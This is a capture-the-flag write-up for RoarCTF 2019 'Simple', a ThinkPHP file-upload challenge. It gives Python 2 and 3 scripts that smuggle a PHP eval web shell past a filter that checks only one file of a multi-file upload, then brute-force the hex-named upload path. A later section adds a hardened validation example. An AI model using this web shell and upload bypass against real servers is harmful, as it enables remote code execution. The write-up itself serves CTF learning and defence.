2019-12-04 [RoarCTF 2019]Simple

Author: KanoWill | Source: published 2019-12-04 15:58

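Just confirming the entry point took me quite a while; in the end I realized this is a single-module ThinkPHP application, and the entry point is /index.php/home/index/upload.

After analysis, I found that this is a multi-file upload and that the filtering only processes one file, so several files can be uploaded at once to solve the challenge directly. For the other files, we can infer the file path by brute force. The solving scripts are as follows.

python3 (correctness not verified):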

    import requests
    import time
    import json
    
    url = "http://33553ba3-3ecf-4551-af99-378c3c2504a6.node3.buuoj.cn"
    
    # Send two files in a single multipart request
    path = url + "/index.php/home/index/upload"
    files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
    r = requests.post(path, files=files)
    # The response carries the stored path of one file; its base name is a hex string
    t1 = r.text.split("/")[-1].split(".")[0]
    param=json.loads(r.content)
    print(param)
    t1 = int(t1, 16)
    
    # Walk downwards from that value, one candidate name per request
    j = t1
    while True:
        path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
        try:
            r = requests.get(path,timeout=1)
        except requests.RequestException:
            # timeout or connection error: retry the same candidate
            continue
        if r.status_code == 429:  # back off on 429 responses caused by requesting too frequently
            time.sleep(0.1)
            continue
        elif r.status_code != 404:
            print(path)
            print(r.text)
            break
        print(j, path, r.status_code)
        j -= 1
    

python2 (this is the one I used to get the flag):

    import requests
    import time
    import json
    
    url = "http://443e6467-a00e-47ec-b8cb-6af3da800131.node3.buuoj.cn/"
    
    path = url + "/index.php/home/index/upload"
    files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
    r = requests.post(path, files=files)
    t1 = r.text.split("/")[-1].split(".")[0]
    param=json.loads(r.content)
    print param
    t1 = int(t1, 16)
    
    j = t1
    while True:
        path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
        try:
            r = requests.get(path,timeout=1)
        except requests.RequestException:
            continue
        if r.status_code == 429:  # back off on 429 responses caused by requesting too frequently
            time.sleep(0.1)
            continue
        elif r.status_code != 404:
            print path
            print r.text
            break
        print j, path, r.status_code
        j -= 1
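
Added example, not part of the original write-up and not the challenge's source: a simplified Python model of the upload check described above, showing the reported flaw (only one part of a multi-file request is filtered) beside a handler that checks every part and gives stored files random names. The allowlist, the function names, and the choice of the first part as the one that gets checked are assumptions.

```python
import os
import secrets

# Constructed allowlist for this demo (assumption, not the challenge's real list)
ALLOWED_EXT = {".txt", ".png", ".jpg"}


def ext_ok(filename):
    """True when the lower-cased final extension is on the allowlist."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT


def flawed_accept(parts):
    """Model of the bug: only the first part is checked, yet all are stored."""
    names = [name for name, _ in parts]
    if not names or not ext_ok(names[0]):
        return []
    return names  # unchecked parts are written to disk as well


def hardened_accept(parts):
    """Check every part; reject the whole request if any single part fails."""
    names = [name for name, _ in parts]
    if not names or not all(ext_ok(n) for n in names):
        return []
    return names


def stored_name(original):
    """Server-side name: 128 random bits plus the validated extension.

    Nothing in the name is derived from the clock or from another file's
    name, so one known stored name says nothing about its neighbours.
    """
    ext = os.path.splitext(original)[1].lower()
    return secrets.token_hex(16) + ext


# Constructed request with the same two filenames the scripts above send;
# the file bodies are placeholders.
REQUEST = [("a.txt", b"a"), ("b.php", b"placeholder")]

if __name__ == "__main__":
    print("flawed   :", flawed_accept(REQUEST))
    print("hardened :", hardened_accept(REQUEST))
    print("stored as:", stored_name("a.txt"))
```

Serving the upload directory with script execution disabled covers the case where a file still slips past the extension check.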
    

Article link: https://www.haomeiwen.com/subject/qadlgctx.html